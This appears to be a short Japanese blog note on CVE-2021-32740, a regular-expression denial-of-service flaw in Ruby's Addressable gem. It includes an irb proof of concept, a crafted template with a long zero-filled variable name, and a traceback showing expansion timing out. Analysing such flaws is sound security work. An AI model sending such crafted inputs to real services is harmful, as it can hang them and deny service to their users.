CVE-2021-32740
修正コミットはこれ。
PoC は次の通り。テンプレートで利用される変数名を外部から操作できる場合に発生する。
GHSA では High
になっているが、このようなケースは少ないだろうと思う。
irb(main):032:0> template = Addressable::Template.new("http://example.com/{000000000000000000000000000000!}") => #<Addressable::Template:0x1e0 PATTERN:http://example.com/{000000000000000000000000000000!}> irb(main):033:0> Timeout.timeout(10) { template.expand({}) } Traceback (most recent call last): 23: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/bin/irb:23:in `<main>' 22: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/bin/irb:23:in `load' 21: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/irb-1.3.3/exe/irb:11:in `<top (required)>' 4: from (irb):33:in `<main>' 3: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/timeout-0.1.1/lib/timeout.rb:112:in `timeout' 2: from (irb):33:in `block in <main>' 1: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/addressable-2.7.0/lib/addressable/template.rb:595:in `expand' /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/addressable-2.7.0/lib/addressable/template.rb:595:in `gsub!': execution expired (Timeout::Error)